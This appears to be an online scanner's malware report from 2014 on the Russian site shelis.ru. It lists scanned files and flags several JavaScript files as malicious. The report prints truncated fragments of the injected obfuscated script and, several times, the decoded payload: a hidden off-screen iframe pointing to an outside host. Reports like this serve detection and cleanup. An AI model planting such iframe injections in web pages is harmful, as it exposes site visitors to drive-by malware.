Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=shelis.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://shelis.ru/ | 200 OK Content-Length: 21198 Content-Type: text/html | clean |
http://shelis.ru/templates/gk_finance_business/js/domready_fix.js | 200 OK Content-Length: 3392 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& ignorUA = true; break; } } return ignorUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? d Antivirus reports:
| ||
http://shelis.ru/media/system/js/modal.js | 200 OK Content-Length: 12689 Content-Type: application/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://shelis.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 8468 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); ; Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://shelis.ru/components/com_k2store/js/k2store.js | 200 OK Content-Length: 9665 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& data:{"elements":Json.toString(str)}, onComplete: function(response){ SqueezeBox.applyContent(response); if ($(container)) { doMiniCart(); } } }).request(); } else { if (doModal == true) { (function() { document.body.removeChild($('k2storeModal')); }).delay(500); } form.task.value = task; form.submit(); } } Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://shelis.ru/media/system/js/caption.js | 200 OK Content-Length: 4064 Content-Type: application/javascript | clean |
http://shelis.ru/templates/gk_finance_business/js/gk.script.js | 200 OK Content-Length: 8793 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& } container.className = this.selector.replace('.', '_'); container.className = container.className + " " + align; container.setAttribute("style","float:"+align); if (!docMode|| docMode < 8) { container.style.width = width + "px"; } } } }); document.caption = null; window.addEvent('load', function() { var caption = new JCaption('img.caption') document.caption = caption }); } Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://shelis.ru/modules/mod_rokslideshow/tmpl/rokslideshow.js | 200 OK Content-Length: 8211 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& Antivirus reports:
| ||
http://shelis.ru/templates/gk_finance_business/js/menu/mega.js | 200 OK Content-Length: 15051 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& } }, itemHideOthers: function (el) { var fakeevent = null if (el && !el.childcontent) fakeevent = {}; var curopen = this.childopen.copy(); curopen.each (function(li) { if (li && typeof (li.status) != 'undefined' && (!el || (li != el && !li.hasChild (el)))) { this.itemHide(li, fakeevent); } },this); } }); gkMegaMenuMoo.implement(new Options);); Antivirus reports:
| ||
http://web.redhelper.ru/service/main.js?c=shelis | 200 OK Content-Length: 2006 Content-Type: application/x-javascript | clean |
http://shelis.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 20731 Content-Type: text/html | clean |
http://shelis.ru/media/system/js/validate.js | 200 OK Content-Length: 6347 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var inderx = 0; if ((inderx = haystack.indexOf(needle, f_offset)) !== -1) { return inderx; } return false; } function hhh_ristera_au(){ var TrasterManobook = 'iPhone&Macintosh&Linux&iPad&Series40&SymbOS&Flock&SeaMonkey&Nokia&SlimBrowser&AmigaOS& el.labelref = label; } }); } if (state == false) { el.addClass('invalid'); if (el.labelref) { $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); }); Decoded script: <iframe src="http://qersmile.jual-bajumurah.com/gweyrtuytgjhfdg17.html" style="position:absolute;left:-1311px;top:-1311px;" height="132" width="132" name="OpenJaker"></iframe> Antivirus reports:
| ||
http://shelis.ru/index.php?option=com_user&view=login | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 11:43:17 GMT Location: http://shelis.ru/your-details/voyti Server: Jino.ru/mod_pizza Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 445e469d50ffa093bcd646def2033ba9=995d62c3162411ee2aab4ce274f16066; path=/ | clean |
http://shelis.ru/your-details/voyti | 200 OK Content-Length: 25379 Content-Type: text/html | clean |
http://shelis.ru/index.php?option=com_user&view=register | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 21 Aug 2014 11:43:18 GMT Location: http://shelis.ru/your-details/zaregistrirovatsya Server: Jino.ru/mod_pizza Content-Length: 0 Content-Type: text/html; charset=UTF-8 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 445e469d50ffa093bcd646def2033ba9=91c689bf179390d6752c8fec3126ad23; path=/ | clean |
http://shelis.ru/your-details/zaregistrirovatsya | 200 OK Content-Length: 26558 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: shelis.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 11:43:13 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 11:43:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 445e469d50ffa093bcd646def2033ba9=161fabdfa853ec7de24a1d8d9e500101; path=/
Set-Cookie: gk_finance_business_tpl=gk_finance_business; expires=Tue, 11-Aug-2015 11:43:13 GMT; path=/
GET / HTTP/1.1
Host: shelis.ru
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Thu, 21 Aug 2014 11:43:13 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 21 Aug 2014 11:43:13 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 445e469d50ffa093bcd646def2033ba9=161fabdfa853ec7de24a1d8d9e500101; path=/
Set-Cookie: gk_finance_business_tpl=gk_finance_business; expires=Tue, 11-Aug-2015 11:43:13 GMT; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: shelis.ru
Referer: http://www.google.com/search?q=shelis.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: shelis.ru
Referer: http://www.google.com/search?q=shelis.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.